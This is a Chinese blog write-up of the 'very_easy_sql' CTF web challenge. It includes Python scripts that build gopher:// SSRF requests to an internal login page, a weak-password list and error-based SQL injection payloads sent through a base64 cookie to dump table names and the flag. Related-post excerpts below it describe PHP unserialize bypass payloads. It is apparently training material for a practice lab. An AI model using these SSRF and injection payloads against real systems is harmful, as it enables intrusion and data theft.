攻防世界——Web题 very_easy_sql

最新推荐文章于 2025-07-23 08:38:07 发布
原创 最新推荐文章于 2025-07-23 08:38:07 发布 · 925 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习

目录

payload1

payload2

payload3

 

看到了题目是sql就猜测是sql注入和万能密码了,但怎么试貌似都没有反应,看源代码发现了use.php

访问use.php页面 

可以猜测这里是SSRF,可以访问到我们本不能访问的界面,比如:服务器本地的127.0.0.1:3306

先尝试127.0.0.1

发现成功包含了index.php页面,此页面端口号为80端口,而我们要用到的就是这个端口,还记得一开始的页面:

应该是借助这里的SSRF,才有正常的身份验证权,现在就是想如何借助SSRF向服务器构造请求,让服务器正常执行我们的身份验证权。下面是我之前的一些尝试:

尝试:file:///flag -> nonono 猜测有协议过滤

最终发现gopher不会出现nono用no,这也是我们可以利用的一个协议

gopher协议:可直接封装TCP数据流,模拟基于TCP的应用层协议,只要按目标服务的协议格式构造数据,就能通过gopher协议发送请求。借用该协议SSRF可借助服务器权限攻击内网中原本无法直接访问的服务,实现命令执行,文件写入等高危操作。 

 接下来直接来构造,参考的是这位师傅的文章:攻防世界 very_easy_sql - 寄居动物 - 博客园

payload1

import urllib.parse

host="127.0.0.1:80" 
content_type="application/x-www-form-urlencoded" # 表示请求体是经过 URL 编码的表单数据
content="uname=admin&passwd=admin" # 请求的POST内容
content_length=len(content)

data =\
f'''POST /index.php HTTP/1.1
Host: {host}
Content-Type: {content_type}
Content-Length: {content_length}

{content}
'''


data_url1 = urllib.parse.quote(data) # 将请求转换为URL编码格式
data_url1 = data_url1.replace("%0A","%0D%0A")
# HTTP请求中的行分隔符是\r\n(即%0D%0A的形式)
# 而Python中字符串的默认行为中换行符是\n 所以需要将0a替换为0d0a
data_url2=urllib.parse.quote(data_url1) # 要URL编码解码两次

payload='gopher://127.0.0.1:80/_'+data_url2

print(payload)

这是借助师傅的wp写出来的, 其中有一点没想明白的是,这里默认是admin/admin,是弱密码没错,但我觉得这里应该有一个爆破的环节,对password进行爆破;而password长度的区别又会影响到content_length的长度(经实验,如果content_length不同的话无法得出答案),所以进行爆破的部分也许可以是这个URL部分:
修改后的代码:

payload2

import urllib.parse

def generate_payload(password):
    host = "127.0.0.1:80"
    content_type = "application/x-www-form-urlencoded"
    content = f"uname=admin&passwd={password}"
    content_length = len(content)

    # 构造HTTP请求,确保包含正确的Content-Length
    data = f'''POST /index.php HTTP/1.1
    Host: {host}
    Content-Type: {content_type}
    Content-Length: {content_length}

    {content}
    '''

    # 第一次URL编码
    data_url1 = urllib.parse.quote(data)
    # 替换换行符为HTTP标准的\r\n
    data_url1 = data_url1.replace("%0A", "%0D%0A")
    # 第二次URL编码
    data_url2 = urllib.parse.quote(data_url1)
    # 生成最终的Gopher URI
    payload = f'gopher://{host}/_{data_url2}'
    
    return payload

def main():
    # 定义密码字典
    passwords = [
        "password", "123456", "12345678", "qwerty", "abc123",
        "monkey", "1234567", "letmein", "trustno1", "dragon",
        "baseball", "111111", "iloveyou", "master", "sunshine",
        "ashley", "bailey", "passw0rd", "shadow", "123123",
        "654321", "superman", "qazwsx", "michael", "Football", "admin"
    ]# 换成自己的字典

    # 打开文件以保存结果
    with open('test.txt', 'w') as f:
        for password in passwords:
            payload = generate_payload(password)
            f.write(f"{payload}\n")
            print(f"Generated payload for password: {password}")
    
    print(f"\n所有payload已保存到 test.txt 文件中")

if __name__ == "__main__":
    main()

 尝试爆破:

 

稍微有些慢,得到1525长度的URL,对应的密码为admin 

得到payload:

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

响应包为:

 

base64解码得: admin   接下来。。。也不知道怎么办了,加上Cookie参数试试也没反应,后来才知道这里才是用sql的地方。。。

现在直接用python脚本来测sql,构造请求包,也是参考的上面师傅的文章:

payload3

import base64
import urllib.parse
import requests

# 初始化请求
url="http://61.147.171.103:54075/use.php"
headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0'}


def payload(sql):
    sql=base64.b64encode(sql.encode('utf-8')).decode('utf-8')
    cookie=f"this_is_your_cookie={sql}"

    data = \
f'''POST /index.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: {cookie}
'''
    # 注意这里的data不能缩进

    data_url1 = urllib.parse.quote(data)
    data_url1 = data_url1.replace("%0A","%0D%0A")
    gopher='gopher://127.0.0.1:80/_'+data_url1
    return gopher

# 测试
sql="admin'"

pay=payload(sql)
print(pay)
params={'url':f'{pay}'}
res=requests.get(url,params=params)
print(res.text)

 

发现闭合方式,且可尝试报错注入

# 爆库得到:security

sql="admin') and extractvalue(1,concat(0x7e,database())) #

# 爆表得到:emails,flag,referers,uagents,us

admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) #

# 爆列名得到:flag

admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='flag'))) #

# 爆值得到:cyberpeace{56c067fba665158ddcac12237bcbfa9e}

admin') and extractvalue(1,concat(0x7e,(select left(flag,20) from flag))) #

admin') and extractvalue(1,concat(0x7e,(select right(flag,20) from flag))) #

 


 

 

c30%00
关注
【网络安全 | CTF】攻防世界 very_easy_sql详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 1万+
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 578
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 8090
攻防世界 -- very_easy_sql
攻防世界web新手 - very_easy_sql(非常详细的wp)
热门推荐
yuanxu8877的博客
11-27 1万+
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
攻防世界WEB | very_easy_sql 详细解WP
最新发布
2301_80637449的博客
07-23 1250
本文详细解析了攻防世界WEB目"very_easy_sql"的解过程。目通过SSRF漏洞利用gopher协议访问内网服务,发现cookie中包含base64编码的SQL注入点。解过程分为:1) 发现源码中的use.php接口;2) 构造gopher协议SSRF请求;3) 获取管理员cookie;4) 进行SQL报错注入,逐步获取数据库名、表名和flag字段。最终通过extractvalue函数的报错注入获取完整flag。
攻防世界 very_easy_sql
weixin_63640108的博客
06-12 1600
我理解的是相当于内网穿透,你获取到其中一个内网主机,可以用这个内网主机作为服务器向其他的内网机器发起攻击。报错注入模板 admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);报错的回显最大位数为32位,此时我们只获得了32位,需要用substr函数进行分割读取。分享,通过URL地址分享网页内容,通过URL获取目标页标签等内容。
攻防世界very_easy_sql
qq_45955869的博客
05-29 901
提示:攻防世界very_easy_sql提示:死记硬背记不住的内部网络时间盲注报错建议保存。
攻防世界-very-easy-sql
chinese_cabbage0的博客
02-28 2967
攻防世界的这个目的详细解析,没有比这个更加全面,更加通俗易懂的了,大家可以参考一下,学生到很多东西
攻防世界——WEB目Ikun_BILIBILI
Y_KolaFish_Y的博客
07-27 1996
ikun_bilibili_wp 一、获取lv6账号位置 import requests target = "http://111.200.241.244:61777/shop?page=%d" for i in range(500): print(i) res = requests.get(target%(i)).text if "lv6.png" in res: print(target%(i)) break http://111.200.241
攻防世界 supersqli writeup
12-14
进入目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界 - Web - Level 3 | very_easy_sql
Blue17 の 小窝
12-29 1875
再联想一下 SQL 注入,注入点这不就出来了,既然注入点在 Cookie 这里,那携带 Payload 其实也不需要了(Payload 本来就是为了去后端查表,验证用户是否是正规用户的,Cookie 也有这个作用)。下面继续深入思考一下,我们是利用目标靶场的 use.php 页面发起的请求,所以对于 use.php 而言,靶场首页的登录框,对他而言其实应该是在本地的,所以我们这里的 HOST 需要改为。利用此脚本,即可生成对应的 gopher 协议脚本,比如,我们测试用户名为。
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 4470
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
[攻防世界]very_easy_sql
GKDf1sh
01-24 1105
# [攻防世界]very_easy_sql 参考链接:https://blog.csdn.net/yuanxu8877/article/details/128069145 ### 0x00 前置知识 - ssrf + gopher协议 - sql注入(报错注入or时间盲注) - python脚本编写 ssrf可以利用协议作为探针访问内网,如http,file,dict,ftp,gopher等 ## gopher协议和ssrf联合使用 > gopher协议是一种信息查找系统,他将Inter
攻防世界--very_easy_sql
08-26 6612
页面显示"you are not an inner user, so we can not let you have identify~",就是说只能内部访问登录。这里抓包还看到返回包里有个set-cookie。注入点在cookie,通过使用时间盲注payload然后再base64转码,编写盲注脚本。构造ssrf语句实现从内部访问。...
攻防世界Web very_easy_sql
DG_s1mple
12-31 2186
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同,Bool 盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些 sql 语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合 if 判断和 sleep() 函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断。当你在index.php登录admin,admin的时候,是不会登录成功的,只能在use.php用ssrf去登录,因为它需要在内部登录。很幸运的是,好像登录上去了,这一串解码出来是admin。
2.攻防世界 very_easy_sql
2401_86760082的博客
02-13 1318
例如,一个应用程序需要从用户输入的 URL 中读取数据,攻击者可以将这个 URL 指向内部网络地址或其他受保护的资源。由于服务器通常具有更高的权限和更广泛的网络访问权限,因此可以绕过网络访问控制,访问内部系统或其他受保护的资源。文件上传功能:当应用程序对上传的文件进行处理,如解析文件中的 URL 并发起请求时。可以对内部网络的其他服务发起攻击,例如对内部的 Redis 服务发送恶意命令,进行数据篡改或信息窃取。绕过网络防火墙,因为请求是从内部服务器发起的,而不是外部攻击者直接发起。
very_easy_sql-攻防世界
szhangliwenya的博客
04-02 586
(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)重新构造一个gopher的payload,带上这个cookie的内容再去访问use页面:由于不回显,所以选择时间盲注,用admin') and if(1,sleep(5),1)#进行测试,或者') and if(1,sleep(5),1)#都可。官方wp里写使用admin,admin弱密码账号,还说登录框是用来校验这个用户名和密码是否再数据库中存在的,所以还是没告诉是弱密码。构造ssrf语句实现从内部访问。
XCTF-very_easy_sql
TA不懒,但还没有添加简介
04-05 587
XCTF-very_easy_sql
very_easy_sql(SSRF+SQL注入)
2302_81650222的博客
05-07 494
you are not an inner user, so we can not let you have identify~(你不是内部用户,所以我们不能让你进行身份验证)联想到可能存在SSRF漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正是因为请求是由服务器发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),所以根据提示内容会想到SSRF漏洞。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。在\后面为'),所以闭合方式为'),
攻防世界web新手Web_php_unserialize
03-28
<think>好的,我现在需要帮助用户解决攻防世界Web_php_unserialize的CTF目。首先,用户希望了解解思路,特别是针对PHP反序列化的新手。我应该结合用户提供的引用内容来整理答案。 首先,我需要回顾用户提供的引用。引用[4]详细分析了Demo类的结构,包括__wakeup魔术方法和如何绕过它。引用[2]提到了当__wakeup被调用时会退出,所以可能需要绕过这个方法的执行。引用[5]提到了绕过__wakeup的方法,比如修改对象属性的数量。此外,引用[1]和[3]提供了PHP反序列化的基础知识和phps文件的作用,可能对解有帮助。 接下来,解步骤可能需要包括以下部分: 1. **代码分析**:查看目提供的PHP代码,找到反序列化的入口和可能的漏洞点。比如,是否存在反序列化时的__wakeup方法,或者反序列化后触发的__destruct方法。 2. **绕过__wakeup**:根据引用[2]和引用[4],如果__wakeup方法会终止程序或修改关键变量,就需要绕过它。通常可以通过修改序列化字符串中的属性数量,使其大于实际数量,从而避免__wakeup的执行。例如,将O:4改为O:+4,或者调整属性数量。 3. **处理正则过滤**:引用[4]提到代码中可能使用preg_match来检查序列化字符串,如匹配类似O:数字的情况。这时候需要绕过这种过滤,比如使用O:+4代替O:4,或者在数字前添加加号。 4. **构造Payload**:构造一个恶意序列化字符串,触发__destruct方法,从而读取flag文件。例如,将$file变量设置为fl4g.php,在对象销毁时输出其内容。 5. **Base64编码**:根据引用[4]和引用[5],可能需要将序列化后的字符串进行Base64编码,以符合目参数的要求。 6. **利用私有变量处理**:如果涉及私有变量,需要注意序列化时的格式,比如%00类名%00变量名,但可能需要URL编码处理。 在整理步骤时,需要确保每个部分都有对应的引用支持,并正确标注引用来源。同时,用户可能需要具体的示例payload和步骤说明,例如如何修改属性数量,如何绕过正则表达式等。 此外,用户可能还需要相关的学习资源或常见技巧,比如魔术方法的作用、反序列化漏洞的原理,这些可以结合引用内容中的知识点进行补充。 最后,生成相关问,帮助用户进一步学习,比如如何绕过正则表达式、其他魔术方法的影响,或者私有变量的处理方式等。 需要确保回答结构清晰,分步骤说明,并且引用正确。同时,检查是否有遗漏的步骤或错误,比如是否应该使用大写C还是O,或者Base64编码后的字符串是否需要特殊处理等。</think>### Web_php_unserialize 解思路 #### 一、目分析 1. **代码审查** 目通常提供PHP源码(可能通过`.phps`文件显示[^3])。核心逻辑如下: - 类中包含`__wakeup()`方法,会强制重置关键变量(如将`$file`设为`index.php`[^4])。 - 反序列化入口通过`unserialize(base64_decode($_GET['var']))`接收参数[^5]。 - 存在正则过滤`preg_match('/[oc]:\d+:/i')`,阻止以`O:数字`开头的序列化字符串。 2. **漏洞定位** 目标是通过反序列化触发`__destruct()`方法,读取`fl4g.php`文件内容。需绕过以下限制: - **绕过`__wakeup()`**:修改序列化字符串中对象属性数量。 - **绕过正则过滤**:调整序列化字符串格式。 --- #### 二、解步骤 1. **构造恶意类** 假设目类名为`Demo`,其`$file`属性为目标文件`fl4g.php`: ```php class Demo { private $file = 'fl4g.php'; } ``` 2. **生成序列化字符串** - 序列化对象: ```php $obj = new Demo(); $serialized = serialize($obj); ``` 输出类似:`O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}`。 - **绕过`__wakeup()`**: 修改属性数量为**大于实际值**(如从`1`改为`2`): ```php $payload = str_replace(':1:', ':2:', $serialized); ``` - **绕过正则过滤**: 将`O:4`改为`O:+4`或`O:4`后添加注释符`%2b`(`+`的URL编码): ```php $payload = preg_replace('/O:\d+/', 'O:+4', $payload); ``` 3. **Base64编码** 目要求参数`var`需Base64编码[^5]: ```php $final_payload = base64_encode($payload); ``` 4. **发送Payload** 通过URL传递参数: ``` http://目地址?var=<?php echo $final_payload; ?> ``` --- #### 三、关键技巧 1. **魔术方法绕过** - `__wakeup()`在反序列化时自动调用,但若对象属性数被修改为超过实际值,则不会触发[^2][^4]。 - `__destruct()`在对象销毁时触发,可用于执行关键操作(如读取文件)。 2. **正则绕过** - 使用`O:+4`代替`O:4`,利用`+`符号绕过`\d+`匹配。 - 若过滤严格,可尝试Unicode编码或特殊符号注入。 --- #### 四、示例Payload 原始序列化字符串: ``` O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";} ``` 修改后: ``` O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";} ``` Base64编码结果: ``` TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值